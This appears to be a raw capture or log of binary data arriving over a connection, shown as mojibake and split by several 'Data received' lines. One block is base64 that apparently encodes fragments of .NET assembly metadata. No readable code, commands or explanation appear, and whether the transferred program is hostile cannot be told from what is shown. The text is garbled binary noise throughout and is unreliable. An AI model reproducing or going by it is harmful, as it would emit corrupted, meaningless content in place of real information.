ï?vßhÚý“dy÷ç'P¡KUÐÜ¿Â?Ю»AÑÉ)„^7“DæŒphµºEo1YlnVk²`ŽƒM§ž¡MŒçš=l|3S¦Oҫ©s+FÊ-l•éÞñ¹QBbHaÈÛÉ7ߤð–ŒÆUBêErÅO+ðÉÕêJDÀƧQ»jª±mÜ)±ÇwôÀFxãÕN4‘ª•Ôíu_Ž:Å—kD@ô©íîo§XÔlD‡ÔÔ½NijtHšP“+´E•NÚÀÄ×Çÿh…\~ìÆÒQ|ns(ÄåŠ*5nö9êµi¦X"S¦U¤3U “ÉúfÝVw†×p4Å{'ƒÛÆÈÐy®;c¥¶ŸPñR£ŸZ÷»Ç5q$Gς6(¤WMÆÁ“Ó¿\\E4í;ƍ´ )ìG_ï€(YΒT U}tJÝò=¹Æ¼3M¤'Q&²}±Ä´»ÔI=† 4N°Êó"‹þ"܌ºí-$©ÉþcÔQì> itzK¼Å՜¡P…J©Õg‹ŒMr‘ÈÅXªÆî=`¤Òü»Œ^)i¥i†âIôûX±Ív5šZÑ£’o8¸*KnaøO¨Ø؈|­A#O¹HYXЮµßò퓩c• hw1U bù¡ÔUeµ/jXC(ÔF«Ç¬uë׌®šhn² úª¸¯‡LÉ£Œ+4.$„•äuPA«úå§Ó4ˆ¢(å (Ü̜¾hûr0¦+‡tÔ<Jßââè×±?²NÖ±™÷6íÎUoÒv×oŽLÐÉ”mqÏú9@Sß¹ÍÍN’\CR’¨"Ôn<1_\ȐÎÅu®ŸƒNډ<´·^=²’FQŠ’ ¯°ú=Cé\Ȃù¯ Ëj&ŽY ì “l·CŸ®r¸RªÌ¤µúäHËV Ž þyv-(&Z¶ë)¥y[t¸à œ‘ydFcÆBX.ÎÁêkþX"”[sØ{d«y{äjÜHþ¹[n˜ $Š_Ô,UW¾ë [Ë1’Ž¾Ø‘ AÙ$ÚÑ=MàYä™ÝËQ²Û- þZí ~°×òÅk/´¨ÝÛ‡Õۂ­>–®¦óŽ 0pW–A®}ϸ,9$2æ)T-£~ðz==GÙµcQ–cæø¶½½:_<×rqó¬k¥v]¦*ܬnp Œ„«-Öð5| '­¯?ófAãò¯àr”’K‹^ã¾d–'ù Á“±XŐ,‹¬«¡Š’¤ôô›ÈÜO·åŒ‘!vŽB ú\+#¯5Å]}p6I?ËòÊß„fw 3B…Ÿ®CmÚ*ï¿·Ó€A±2ÄòO™ì0@@NM<‘F®À…nøû`^&M£s¨£`AýNá¸9–2Cnàþ_ ´q§ŽÊ¤3²–-DµürçHÐ+(×$¨$ò~8  „óPÏñlµ BG>\jê 3Š…ë`¦û«° »Oé€v’”€àŽxz‚8±Óœ }ÐQeEÝñ¸ÿ\‡‹cÜ7€sÎê¯Òó Ó™€bÔ¢ìÕÐýð cMŠí"€üŸVæž¼q÷€A i`Üô£ùfò Z¥{U4Eî4y¾Ã‘0Vve®()¾·ý°%Ù$ Ìëe‹PÝÞ¯¶[OvIdcµ»† •R‰;Ü_ŒG£,ì…•ۺÖè·v÷ÀèÝ"‰ãóŠ†!RÂøã°Æ4Ï#«y†ÈÞîI×O|OÈ rÆÀ ۘt°:uïœ#xÔ۔$õŽß‰¢³¾vó[¶æ>˜Úñgr¢¯'¥f,di5ED¬BµR’ ‘}p²<“µ»¯îȵ„V‹j%aÚÅxy…_ïÓ*‘ë‘ìŽ7È¿ùW:wdH—͝Xì)TqÇCŽèôQ»–™Ì®­¶ˆ )¡ÐwÀA˜4¥£‘”2þ'±|ö¬$HŸ‰\öäþ¼c^%mHf$(U[ú–ÊG¥_+~õº$@èkÞÿL4Š¥ÖŠ“j õp íšà¢©$‘óæó#L„Ê¡HÝb¯ÞÆoE¤¶òÌÍݏc}(’I£ < O EŸ ÏaöwMZ‰˜ny Ñv6O9çtHU¾ýsØxaf–Åš·¨Ç#]ÂÎ@,c‘¥r¢v®{a¢]ÃÔ9^+œå,sŒ¢Ð€maӀ/“ð!éþx·ˆø¬>I7«¸›À§øƛÀü.mL¬ªÔYWüMŸ™¾Ñx´þ1â³jfbK1 vè>Úýºo֔]ËGóÏڨى*ÃNV¹ÆI–לº¨àM§}N¡!K;0P~¦ý}—ƒì¯Ù´Þ£ï3ò±A®Ÿ!Ÿ+ý”}’GvûCâ`G¤‡˜ËŠV#©ç°ÿ]3[íçíY•¤ðßq° ­2ÿLCûAý©é¼K&‹Ãe×[ãóÏÏí~§ÄuO¨ÔÊÒÊìY™’reóµ³4Žå˜›%ŽJø|­Ñ—뀨soKÅ÷QŠ§…ÌŠ?ÌÿlӁ|¤T=T5ðÀq#Û¥r84ëéãò|7]"5¸e‹wp·_®)£#!è²ðx”^“6¦2ð2„z‡4~ëŒ6 ƒ*úÝ6è5jc<0…aó„ÅüHÀÉçk&þâQ¶þwÏúãÆPbÐ'÷c øœÍÍïû_$º¤h4ñEÝ¡H(ž´ Ì÷ñM­oW¥*Ô – |Åÿ<r1¯#I1w×#_8Úߖ1„6áæΡo “_\þÍ# '”ƒ´([øÝäx|‹/ŽêœVV£ÿÊë|WM¡ÑýÏI{º9«êI÷Å~Ïjx‹“Óâ0=XÓ¾ÐÏH¤Ž[Ž=Ç¿Ó,à3Ê܊Q´Ó©‘Ÿ\Ë!4XþïjÃ4éí@|;àyŸóÿÚºƒ1Ä(6ãh÷¼P}ðZš  FŤwñ)X0£·ÿ(ă?ø†ÏÞXñ£‚lš~£œ†}B! iTvŠ¿™ê~¹&FDg$R‹5”Ä£cEXƒðß_Á´.þêOjÁIâڙæ1èҔNÕÜÄ{⚠\jºèrZ2Q@äð¸Ä¾ö¿s#lÞw?Š¸ŸnŸ6À؋Åõ0ɳWáÞ×k ~}>ŸÄtáã`ó ûó±x„&!§Ôò¯ÒÕf3ðø{¨øÌ^"þ©à 8*ë؃ýp#Q¥– J:¼89m>†}Aô¡Uÿ ¿·G¨…e2ªnín£Ôx C·JMÍuôp4>Êxñ™}^¿áãð6{ô‰ôÚВ #ñ±Æ|ûìÔþ)Ú=4’L¨W
Data received u«:+rü-^ùôqâzM«¢žÀá‰ú÷ãà,ê,”€_ç.¡C´3#,«ðÃÜeô„H ( ®pšÄâvª÷ÿ\b²€d U} ŽõßúãSy#bÇf®?ZÅ+…AÀ¼ öƈʕÀB}(2¥kô¬ÄÕé}GŒõçnö þƒ2µ:{'¦–’§¦bϬŸGâávVSv{)´—| ò>+¢öŒ¤Óÿ”`{o³Ÿµ=N‰WOâ eŒêî3èZOÚÙíL&O¾,d.æ Åg烤qÝpRÄëàßìßhÿjþ§…£ðËÔHGâªPsãþ3ö‡]ã3´š™XƒÑo™%²¤Þ9¼¨šp‹Hizç¨û=öZ]dªò)ÛwÈÀ_À>Ïͬ™]”…>tÚeˆtÒx|z-:¢(2“Ž¸³ÎgÊÜj³B~ù7|gaÀ±Ù}¹üµ`|3>`Ÿs€œÌµC¾.è$áe>Ý°.Y—ƒcR¢‰XƒüGùá!m±‘ñ7‚ŸÓ;s@“G- »ºî;p.M·Ã(ë}9˒?ƒg*MuÀ«¶Åü'xåH9!Û4FsÅ`AÜ+Œ( ƒí€-¹‡«._jÐçюë8€Z¨©ÝóÎr2¨߶^@± 5¹l´Ò¡!ˆ²Ã˜úØ÷x”¥V†ëý0±»£™7¹î'¨œ¶¥™XÑ=0B ƒ³i^¹C:«–j£ØàÖ@à‚O8'ڃɾžt¾ŽB2– G8 DÜí€ÎðE›¬®áTG甍¼Ò9ÛY¡@ ’{`U¶SR×ÓӐÀ)î1W‘”mÏ\…•‚Uçå€ûÌYX^ø˜°œFÓG’03¸|O¾_{áh÷Ó1 ¼áO,{×lˆ˜oÕxüG§!…¶&ÍvÁ>Ù\Þ,Wl´’º©y*þ($R̤¬m/±ÀÀ¬ÉV~ùDUIKsønòâpŒÃ¥±,…A6À¦•Ñ·6ï-þÁù–Ê‚G¾[PÌî }BŒ¡…”Ð<ՑP¬í¹@.ÙuVn_|´±ùp«¯”IMí#®³mR§èpN0Ð9 ß&-#ù‚êç¸ 5ê9]b>Óu‡/hÌE5P8•ä
Data received Íõ¼ý3¯ðß û]öz8µÒê Yc ´ñÚڑ֘ÿ¾å 7ê&Mäƃøh×>©á¿°¨¼[Á´ZíOŒÏ¥Ô΂Ibm8%ÓDÞàk’~™äü?ì΢o·Z³óãTb‘eख?UIÖÅuÍÿÚ÷íW©ñ]OÙï™ Òi\,ÓDå^g^ªHä*±"‡p}°=oÚÙì_mV ÿk
Data received EAAAALAAAAAAAHAAEAAAAAAAYAKQAwAAYAXAAwAAYAcAEwAAYA0wEwAAYAHgIwAAYAJgIwAAYALAI4AgoASAJZAgYAcgJ3AgYAiQIwAAYAkAI4AgYApQJ3AgoA8QJZAgoAewNZAgYA7wMwAAYADQUUBQYAJQUUBQYAPgUwAAYARQUwAAYAVgVhBQYAcwUwAAYAeAVhBQYAqwUwAAYAvQUwAAYAJAYwAAYAOwYwAAYATQZVBgYAkgYwAA4AmwanBgYAAQcwAAYABwcwAAYAGAcwAAYAJwcwAAYAegcUBQYA0AdhBQYA6QdhBQYA/QkwAAYACgowAAYAsQowAAoAGwwlDAYARgxPDAYAawwwAAoAwQwlDAoA1gwlDAYAew0wAAYAtxzXHAYA9xzXHAYAFR1ZAsMAKR0AAAYAOB1hBQYATx1hBQYAbB1hBQYAix1hBQYApB1hBQYAvR1hBQYA2B1hBQYA8x1VBgYABx5VBgYAFR5hBQ4AMh6nBgAAAAARAAAAAAABAAEAAAAQABoAIQAFAAEABAAAARAAQAABAAUAAgATAAMBAABHAAAACQAOADUAAwEAAG4AAAAJAA4AOQADAQAAjAAAAAkADgA9AAMBAAClAAAACQAOAEEAAwEAAMMAAAAJAA4ARQADAQAA3AAAAAkADgBJAAMBAADzAAAACQAOAE0AAwEAAA4BAAAJAA4AUQADAQAAKAEAAAkADgBVAAIBAABFAQAACQAOAFkACgEQAFwBAAANAA4AXQAKARAAegEAAA0AEgBdAAAAEACOAQEABQAkAF0AAAEQAJMBAAAFACUAbAATAPIBDgAxACkEDgAxADYEDgAxAEwEDgAxAF0EDgAxAHMEDgAxAIQEDgAxAJMEDgAxAKYEDgAxALgEDgA2AM0EDgAWANwElQARAOAEDgAGAAILnAEGABALnAEGAB0LLQMGACcLLQMGADALlQAGADMLpgAGAD4LpgAGAEgLpgAGAFALlQAGAFQLlQAGAFgLlQAGAGALlQAGAGgLlQAGAHYLlQAGAIQLlQAGAJQLlQAGAJwLMAMGAKgLMAMGALQLlQAGAMALlQAGAMoLlQAGANULlQATAN8LDgADAOoNlQADAA0OlQADADAOlQADAFMOlQADAHYOlQADAJkOlQADALwOlQADAN8OlQADAAIPlQADACUPlQADAEgPlQADAGsPlQADAI4PlQADALEPlQADANQPlQADAPcPlQADABoQlQADAD0QlQADAGAQlQADAIMQlQADAKYQlQADAMkQlQADAOwQlQADAA8RlQADADIRlQADAFURlQADAHgRlQADAJsRlQADAL4RlQADAOERlQADAAQSlQADACcSlQADAEoSlQADAG0SlQADAJASlQADALMSlQADANYSlQADAPkSlQADABwTlQADAD8TlQADAGITlQADAIUTlQADAKgTlQADAMsTlQADAO4TlQADABEUlQADADQUlQADAFcUlQADAHoUlQADAJ0UlQADAMAUlQADAOMUlQADAAYVlQADACkVlQADAEwVlQADAG8VlQADAJIVlQADALUVlQADANgVlQADAPsVlQADAB4WlQADAEEWlQADAGQWlQADAIcWlQADAKoWlQADAM0WlQADAPAWlQADABMXlQADADYXlQADAFkXlQADAHwXlQATAJ8XmAMDAMIXlQADAOUXlQADAAgYlQADACsYlQADAE4YlQADAHEYlQADAJQYlQADALcYlQADANoYlQADAP0YlQADACAZlQADAEMZlQADAGYZlQADAIkZlQADAKwZlQADAM8ZlQADAPIZlQADABUalQADADgalQADAFsalQADAH4alQADAKEalQADAMQalQADAOcalQADAAoblQADAC0blQADAFAblQADAHMblQADAJYblQADALkblQADANwblQADAP8blQADACIclQARAEUcmANQIAAAAACTAMIBCgABAFQgAAAAAJEY2AEKAAEAXCAAAAAAkwDfAQoAAQBkIAAAAACWAAUCEQABACgjAAAAAIYYbAIjAAMAdCMAAAAAkwCxAjoAAwCEIwAAAACTAMsCOgADAJQjAAAAAJMA3gJAAAMApCMAAAAAkwAUAxEAAwC0IwAAAACTADQDUgADAMgjAAAAAJMARwMRAAMA2CMAAAAAkwBoA2AAAwDkIwAAAACTAIMDbAADAPAjAAAAAJMAogNxAAMABCQAAAAAkwDAA38AAwAYJAAAAACTANwDbAADACQkAAAAAJMAAwSMAAMAMCQAAAAAkwAWBJAAAwA4JAAAAACWAPMEmAADAFAmAAAAAJYACAVsAAUAoCcAAAAAlgBPBWwABgCQKQAAAACWAIYF2wAHAAAAAACAAJEg0wX8AA4AAAAAAIAAkSDuBQIBDwAQLQAAAACRAAYGCQERAEgtAAAAAJEA9wY/ARMAgDsAAAAAhhhsAiMAGgDMOwAAAACRGNgBCgAaALg9AAAAAJMAQQeMABoAxD0AAAAAkwBUB9EBGgDMPQAAAACTAGcH1gEaANw9AAAAAJMAmwdgABoA6D0AAAAAkwC9B2AAGgD0PQAAAACTAPcHUgAaAAg+AAAAAJMAEQj4ARoAFD4AAAAAkwAyCFIAGgAoPgAAAACTAEUIGQEaADQ+AAAAAJMAWAj9ARoAQD4AAAAAkwByCAMCGgBMPgAAAACTAJAIDAIaAFw+AAAAAJMAowiRARoAZD4AAAAAkwC2CBICGgB4PgAAAACTANAIEgIbAIw+AAAAAJMA4wgZAhwAoD4AAAAAkwAKCSACHgDAPgAAAACTAEAJKgIjANA+AAAAAJMAWwk3AiMA3D4AAAAAkwB3CRICIwDwPgAAAACTAIoJEgIkAAQ/AAAAAJMAnQlCAiUAFD8AAAAAkwCwCTcCJgAgPwAAAACTANIJbAAmAAAAAAADAIYYbAKxACYAAAAAAAMAxgEKCE4CKAAAAAAAAwDGAfEJUwIpAAAAAAADAMYBIQpeAiwAAAAAAAMAhhhsArEALQAAAAAAAwDGAQoIZQIvAAAAAAADAMYB8QlsAjEAAAAAAAMAxgEhCnkCNQAAAAAAAw
Data received –T ªíSÅÀâÚå•Ù–3¸ßBÜ Î}<Èhîã“\Œ Wðí³BHOÞ½*ƒux/2u?f]!–=+ÊÎBî^6’:ƒßŒRHÍ°;+†ç’?ëéuzí8/¡Wª2ß&ÏJ<ýp2¼ n‹Äð)÷£wUϯé|ZIôJ%hö²¼Ð6 gË¥y—{,Çi%{{V{³<ÌcÒêc@•ƒ Qgƒó¯åêàÕT+庺‚ °aa‰èAøæ«jÕ5:e‘[€Ä2·á<u瞾ٜ¨š²Ã§H¤UÚYNÂ6óÁ‰¿Ž1¤Uµ€nZÈàû|O~Glj‰mãm‘Ô`å՗Q|mès<ê1QÅpOªQ¤’TU¢NãÀ®üfmKøf§a–&µ#ñpsó¾®5û¬ò™ïž£žÙõïû]  &’ £wde&þþ¿®|ŸW,oáò!p®¬ {àbl n€1Ý3»D9³|ƒŠy¸†à1e¦ˆ-•^râ2ÊmE¬¨5;茩Ô$ADŽYN<µXö‹Z<WL€¾âþc8’àô:Ö\¾Ä΁ùàB&àV”l#‚ª-T ďŽ)µ%vQè=¯¾2\m, ðr:}qµrR~3ÐÖÚ<÷ÆDkÒFV7U} $Šcºö¿¶:tÓ<Q<`3I·Óé /¡Úw6949ù]ðé&5fShÌ€~EIüˆ?…]jiãÓޜ—Õ·3qék;x±føºäñҀ:1UônfÚY÷"¨P:òóӃÎ"ûÉØhۏWp<‰¹[qm¯´µí?Í?‘®ÖÅ<k{v¨V{Š¬ <žWÿ|˜ƒè’?\]&0ȱ±X2;(b ^)¯Ó$ª˜­ŠãÂ]TZæ1ªcÇ#¦Oâ $²¤Vø‘Ú›M!;Oá¬2ͧן/R‚Ú8£l}ðÖË›H‚>-²Ç©›î2uz)4’úÔ´wÃW\€*`tïd‹cŽ˜‚ ËyršÚ ÑàU':¢Áˆ‰$_éðý襤nƒü9 ¤5X+ÀKY¢Ò•óY\4 Æf¤ú• ^&þl0ÍçØє*8<ˆýÐK½HSÐQÁ7YüÍ3‚ü&ÁS\Žp)3ÊàvçÚ'Šr¡Š‘Ê:äù/±ŒÑÕ׋>ø2ùÊÈHP£¯s’•cb¹±.˜F¯¨Á$e%°*zŸ†®…’*IM±J .¯ÕD Ù7Ᾰ}##H m¶l6¥Òfƒm "ºà¼7Lñy‚F»¯­ü0jšxÖ·  Ù+¸úcb$‰gT2íc҆*ï^8ÕTu¿jÀè`ó¢©g7Ï£Åü±‰B)(£pj€q5™Š± µW =²Vz-~¢EŠÀЄETDíÛ¾fO¨B΀5nººçVÞö ñW|Rm’Ì\LÔIí€T•UT±Vïl‡D#vÖ¯â aâT@©v@«÷Îbâè©^„‚}Œ¨E.Þ/¹ÍbñíUµ4l™SHªC(#h‰çœ˜'FÑIÆûœo|Š$vdì¤^bÓÀŒåå$éÅbmb»Ì­xq6äa¾¯Œ ­B™&vQDš ¸Å™ 2~#5¤³'âKãÔí€$ÜO@p3ë:±¨ôþl[‰¢;àš¤Q»é€<ŠË*H"ˆÊÖVue¨ß?<¼jOE'é€>‡ ¢Ir.á”t(H'Ÿl¥`YÈ,JŠÆV³«'È»Ü-Õá*’¤ À Ùúaô˽É, íY£0Ë°ˆúã:Wvu…˜ÿ¶mC»m`¬Êh…s««ìkŒ ™ÛRÉÚC®»ãè0ˆ6f@ƘÑ?\ÏE*á›ð¨ oŒ?˜ÒS‹®Ô/åËDÖ 04Õáã$ bÁXÐ=†f4Ë@]0ê$.P°0žq6¢BÔ@­ œs“°`A$qf«ÃÌIf&¨ñðÎwR5°À<Z©<ÒÏŚÜò1¨¹iTƒÐøˆŸpU-êøwÇbZ(á[“d‘ÆÓÄ]#e6yïó«iÔ%@º§#ê»è£`^ӐÊv©<‹^ø5)*òAàbí©DpŠÀ fcÈùey¤!²:qÛ.Ȝ${šúüº:Åy<¶;Y{‘ø¾X¶´7mç¿Ç%Í-,?±C6
Data received ÁK0  š³›­£>áíæ6™Ã(ùˆyb} nªßV<`Æ´š]<J‰"6 m¥]Ö±iXÔP4}^ª?‡œˆ%òÎÇü=¸¯×ñ9ZyžeÓP¹š$üEÕðs+q? 6Œ~ ÖáãúåSÖËPñпO¶i<ãN&12ÄÂÃv£ÆQT)wñÏIáúˆB‘Æ|¢Š™.˜Š$ƒí™}*L pÊçpóÚ§¹;¿¦=–tðÕ_/͕–DÚJ†Œ°k#çéïÆÏ­Ó¶¢$)·q›cf/Å]mö®ÿË .ºªXw9!v›<›íÇŸNº$EŒ(Þb–1@ë‹êtÖÔj5*á:²G¶Ëà¾8$ý04uî‡P¤&¢zIÏ.¥*ý(Ì+ÜGê{=§Âõw’ÍCµŠ÷ϧ”™ÉnG–ãóB0-©–«r€ž]«SVí×<”Öyo¶þ!! õ=ó£K£ aIqÚÔt¿óg6œ¶›Î¨ $©Úyîy–Rù¾k)$HeP Q$}úd.­—N" Ú¥@KDž£¿\–Ó†“b)¿1ÅI ¡úç6’¬û0(…&‰<ûÖ~ò<á%0¤UZˆ ‚Ã,Å'‰™‰ƒ^Ðz­uøœq˜Æ 0³[VɯaùáœÂX³”(Ëü>®A#~=ð-¤˜…xý@߅c·•=Fï7 l«ººôL$«êw§–VUƒDÿºoóÅôH’C<6ö(ÈGfºù°Ša)ŠÜxoqYwœJä²±P,åÃŸúeΕJB‹{ÎâçµPa_Bp~R‘{›nÝÀíä‹ ïo=2b´Òµ´;|‘¨Q©’M„†(‘ü@aï”hî,æ€Z!zî8ù^Fž=ó;M+x>ãÛ~ðH’҉cëí·Ÿü8ö¢eÓB­“4Î%f@&º¨þ+÷逢ˆ4¹ ˆÛÁ¸êzÝeuÈú†!%w*”*hq@|ÀïHÂ4!y ÏOQ þY'Tû·ÔȐhÕÙýo(‘«Ð$rÀn£ß.°«:¬r¸×©j:ûàw˜ÃT²°bU”ú‰ºßd¬hüÿ¾10VÔÞpí㪀úÕb^;|°ðû;+B]ƒí;lwøš\…×8y4Šƒér€ úà H4íÿ/r±ã½ý/:†_ޚZ<ó֍tøÖ¦V`Ûޕ·-`ÿ®PC-1;(H^?<¥„pѱ5Èj£x@Þ{:Y5¸ÿ< yÜTK°m£]O7ý0qµ:‚]E÷Ã}Ü3!‰VfíçÓÏO•aƐîòÃU®åYFÖ­ÛM‹ê*þ@àHbMTjdY±?‡móc冤%cdhÌåAæȕ=¿¡ï]{SU>N¢f%ԗ.6ÙÜEõ?ûaæðæI"‰Kƒ+ˆÁxÊ«_u6wzûVº‰–v!W«6æcwd×?Ú³GOâ›'Ä'lŽX.àEžEš³D9ãÔèL ¥RÁ‚¤±f ­ñgŠboܾŸÃÞRDŽéûÃw`@õã– ˤÓÇìðͦ׎A|Æ!6 ®¦IiüÐhU‚O&¾8Yc-¡Ò*¬eeP8 ¬[ÕϾêãF¤’H¨  $jù`7áëçø±ó”2°bÂV'Š>ÂïŽ0cLÆpž¥Rn¨“Tk4<2)4þ8²$¡š!Ê/ 5} |ñö‹O«ÖG4bPÛd$ÉüJ¥¿ ›þp1õ-J±¯–Û€f>Àöê3gÀüM6…uº˜ƒD„»šØ÷µì¿oE§• ‘¢ûËiŒM!RÊ­ºÀ ½”Ýtï•Ôxœz)Ói'ÔC$ŽUԕ(«ÅrÏ?S.–M.¬i4‘¤j¤´‘’ÜBï›$ŒÏÓéÿr2:«K@|oS§XôPèN£ÍQë) ’G<’I«>Øáðˆ&äŽ)w@ 4N@r¼Y#¯ÇŒ ЊúiÖ5c´f` §Ï=/ìîuÑ}²ðI‹&ã8ˆµÙÔ©?“óÑM¦È‰i¢­¡VFÜìGR3KìDÒ'Ú¿„x¿Ú0±u…c"Š&°=Oۖÿj£_‰ ™´³¤¡Ã]¨ñãùæí"ŸJàí`ž#®e#ÒGª+ý3Ï}¹—J¿n§“Iç„:`ÈÈÅ؁h›$Y»ûAñRº]~Ñj|WW „*U€÷æùÀÛâ‹ö3ìc»3+èٔP¥¨áZ°>òòUw„µ'¸ÏyûCW³Ï°ˆ$[:i˜ªßCå‘×>} H̶ \ Iw!Q¸t'F`Ut`Í\⏠(’œ ¬½Ök¯\ã‚r“J$•ö€{ݟé€Qs{˜¯'š bŠM¥ ¯uaÏÏ™IM—GuöÀ©];–‘þÓFmFš"©"–¥\ º¨Ù|˜ÐÜšÀ±Lå¥Bpµ‡‹F‚BÖÁGð¡ùk ø^ûäH»Pù€1Œìj÷ì~£#S§7­Üç9g]Çð”euùËü¿ðà HˆÛ‡SÛ W%Ë5Ç3Í~X}+·™Ëv¬‰$SÒÚ÷øᘀ¨AëíóXêJ†°¼%¨VØõ´sõÀH¯¨…­ß,w.ú«ÅýFK¾}òÈÎZƒÕ÷ºÀ~d-"° J‹’2k’:ûÞ*]™A!GǓñΛ©Àf $’¥«¨Rhc:];ùeNÞ0pñ¦áŠûÖ9§B³¦çù÷ÀdiÁéKbÓDë*ÖÛì0𼏮Áç§l¡Ph‡f8M;’7m¾ã,tä>Ú_|$hí剾pÐFK‚làDUº Æ¢”Y®pâg6hãPe *ôÀXéʨlÐÐÆLaGQgõÉ£ŒwEµ{ 3Jۙ®ƒ9tìí¼RðÇßL¥‹õWKÂi´ãË灀<A×mÑ `Eë 釋N¡Á¸ûeÄ'ïJk öø`&Ú6Y7"¯~# šešê¬¼lD Ü_oÂêò4ʱ³š«ŒDÊ­@ºä¶•ŒJ€( Eßsš¡K`z°öÉ}>øX‚T“cÞ°2ä$ ›H*›÷¿¦%&…6Ôæ²Á&áê¡uŠ< ¬Äd~X –"»˜ŸªŒ^xÎëAÈã¦mLÄ¤ž‡è¹x´JA¾·ç‘9=~=²ÎÛMÇ{ï›Rh‘`D ‚ Œ  ûʱ×^ÃÛ'U§ýäd€A;t¨ú_ûXCpËjôû–3·‹5ù`a˜™ô»vҁ_Î/÷f2€;lŽ™è>îFƒ èFt»ÞZºÝØ_¾ ºVF¢•ß:P /uqš?©xíU]0ÒÀk€¤r<vãÏI§MƋqþ!”0.ÑW}Æj¶™E×=+ iÀSkõÀÉ0×  ä…ï@æ’éÁ5@“Û8BTEqX ß#"›Š¯kwËéô¢F4hß4!Ó¢*ƒék¦Ü1´Ñ¢U/õÀÇfŽ@ř‡Z=0Â&-fʞyþY£÷2Íܨ=ò_JŽØë µŽyü‡¶tH!Þ#Ü<m4ê¦Èà¼Å 2] qÎDÚd‘YÍÛÀƒß¶ ôÀJ¤†¥y<n®¹¥¦…]UJ·IÃ˧ŠgU%^xÀÈÕiÙt÷üKBý»fyšÉŸ|õ¿u]æÆâLK[ D]ê+š"°<ð€ûe†œßCšé2ª<ñ¬<:?U£+X+Lç¨ÀɇJ¥‚² Õ`ÞhÁP»I$rsn- … ꢇZʝ3°–p0åÓ4a@$’.ðB+°)£×= šE 9êpQi‘Xüp1ÓB¤[i9 xõ Å}zæ‘Òº±j±v¾7Ÿ,°ˆ†5É ÖH£GWkmہ7ßs4,V")TnútýsPB›h¨½²È•”½Á ½9y!CÏJ<^-¯vJÆ
Data received Åüp2:î]nøÜ䶑æE÷lÄ]›‹$ôÍ]&˜#2ì4‰7ÐFgRjõªàÅÂ8óõÇ~03eðçPT#3©§’§½ŒܐG¹È^v‚}óCÅgDâAv%–ë}íMv®™™­×}íQ *Ù­×d×öÀFVV‹ifº “í^ø D!;-w<qúÌ{á4ÐO+o…Ô2Ûš
Data received re܁@rÀ~XáÓ,ŒIP·BÏ^™ÇM@ínœ6r¾ÒHãA%Õ¨Ò`¥‰c;‡+‡ŠBñ¨NIê>\àt%$³8;{cÌj]r@¡Ç|¢”·–A+ÉÖt _r2#š«Û€dS4åÉ Y'¯L$³oPñ½¨úä…0DÍVIJ‘uúbæ7hCG¶‡UïbPÄmÈç¶V-Nô’&ô’µ}ëÛg¥!ýL¦þG:W å˜ÃVŽð&å‡RJ}Åf„ý[8BªÃPË«‰Ùs^õšjQc$áí€-N²T‘\±åH­ å˜ IbORo=7–²Ä6•aø€®p+¢Ó±%•O¸ÛΝç«è.Ev¾NkËရ½»å“ÃÕ#-$jv=ð1*ùq!U H>øìð,JïÊ+ʞ£åƒ€é¥EŠ`cnÎ;à.K¯$±ß/«D’Tü1‡ÓM£ýáD’#ŀŒdA¤Õ­ „˜s¶úûqž$¸ÈܹÃOy ł–åUyà,Ÿ¦;£²01¢ÊŸâPÀŸ‘Ã̺}G–ÒA! jä8¬“ǧŽ½ð2™#BeÜǓ¶«ëÍþ™U ¬ )QÞ³Ð:ødÁé§%Ú2¯OùrÙ|½4ªâ à“ò!E~G8@’#9˜Z$"î=bGè Y¡‘ýèÔ ä(6¼ôâÏÓ=˜ølHÕ¥”éºE$|ŽËuÓød$Ë¥ÔùÊÁóÕ¨Ž„ú0<ÑÓJ5.…£m%š€=…Ÿˆ89¿rÆ6JeàÝ=8#=LgÃ`BcÒNXöóT‹‚=ˆêáÒÍ#Ìce,ÌJ±ßHßεAS¶ÆT¾å"ì欺8»‡ù{ ÎI.Rš-ÏN½òáòF3¥‘&›aÓ©ŸN<`…[iŽø¼ @Ì.|2ɸ±ºúãڕ…J O~™Æ TOP/P¡ƒ¹` (|AËUfš7zX®ÙE“F¸=ñçÓF)ÅfYj sBÅà]£ ¡Õ·)$)<+ûæç…é‹FáUd¬j¥”m,Üy⊷5ü9Ÿ¥ÔǸ+iä”;—ržÝVÔíÍo ™4ú]SÈI;+DĀ0Z=04ü?O¦û³ê^}4*!,ÛHc´2¯EcDï=Hù 7ƒøWß<Jƒ´h6±R„XfUw꿦9à‘ë¼Z!§ h Ûµ÷UuܬmUWÕj¤›³¶»g¿OÐÁ K¤ÐysÂV™ä€Crv_a\ð8Àù§‹iaŽ0ñjVa+2’ë·k ¶Aöõqßà0ì-ø„f×±a«]&¥•¦%€ d†RT‹øô=Ö‚xF·KÔè7NWÖË"­±¿düO8¦£À|6mvâðé]¡•e´ÔDŒÌ¤ÏûšcÏV7Í÷8ÓǯÅ$ OÝ÷0Rh »ºr[±ìÇæqɤÒ"¦@vÈ´Á±ÈoŽ{Ÿû5àÚ-†-҅HŒ†B¤lÌÙè:~yáÖn1¢†pcQÐՂO>ø(ÈÌV³Òýºá7/¨ʎ™°tºjŒÇ³1 ª‹¦ÎŒé¢V¦FÓ½ÿžš•ƒ)Ûß ¤ÒÇ:9w Ê8×5<I´¯¡• ‚4m'põـ¬Á‰[¼ÙµŠ“UÛ+gmרÎ$–²lå€ÜÔ:ž+ÒB‹¥ŽPÞ¦$à îpòigIRÑ[Üå#†R໨{XÀ¢©PX©¢2Ê°e'ŽŸ›Ÿñ(t;¦ ½BšøÌx×ÌeD¦406|(¦²EÐjµzˆ´!&•AÜÊ%¤¨ ÁePMt'§QôÏ°>¡ðÿÚ¯„E ñ—Öà6h·•!eפ¶ç}GqcæáúßÖÔi³ÆÉL-Få 0£×A÷Ï¥ý„_íoÁ$†-0U£&DŠ0« ; DÑ%y¾}Gxöƒ¦ƒOö×ƚ)w»kæ/WÁ.Ö9ø眑`XAØÈz†íž³íï‚jíǏÍù±lÎZª‹1$Qö$¦yEÒM"±@Q»§Q"-1҇ÆQü5‚UFSe¯ã”Ýv0¾œgÍǶO0û4Û@.Û½€ÎÓè§ÔŽ­å$‚HçŸÆzVÏ
